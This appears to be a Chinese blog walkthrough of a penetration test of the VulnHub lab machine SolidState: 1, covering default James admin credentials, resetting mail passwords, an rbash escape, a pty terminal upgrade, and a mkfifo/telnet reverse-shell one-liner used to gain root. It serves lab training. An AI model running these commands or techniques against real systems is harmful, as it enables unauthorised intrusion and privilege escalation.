当前位置:网站首页>vulnhub-SolidState: 1靶机渗透测试

vulnhub-SolidState: 1靶机渗透测试

2022-07-24 05:18:00 突出啊突出

  • 一、ip探测

  • 二、端口探测

  • 发现频繁出现james,并且4555端口还运行james-admin

  • 三、端口信息收集

  • 查看下脚本,发现使用root/root连接4555端口

  • 四、端口信息利用

  • 4.1 nc连接4555端口(root/root)

  • 发现存在5个用户,并将5个用户密码均重置为123

  • 4.2 依次登录账户,查看邮件(POP3)

  • 使用telnet登录邮件后,发现john账户中有一封关于mindy的邮件
  • 登录mindy账户查看邮件内容,发现ssh用户名和密码

  • 4.3 登录ssh

  • 登录后发现是个受限rbash,很多命令无法执行

  • 4.4 rbash绕过

  • 在ssh登录时尝试绕过

  • 4.5 升级终端

  • 终端优化
  • python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg
export TERM=xterm
reset

  • 4.6 查看其他用户进程

  • 通过/etc/passwd知还存在james用户,查看该用户进程,进入/opt目录,发现存在root账户权限的文件

  • 4.7 写入反弹shell

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f

  • 4.8 开启本地监听

  • 收到反弹回来的shell为root权限,提权完成。

原网站

版权声明
本文为[突出啊突出]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_68117643/article/details/125628015

边栏推荐

猜你喜欢

随机推荐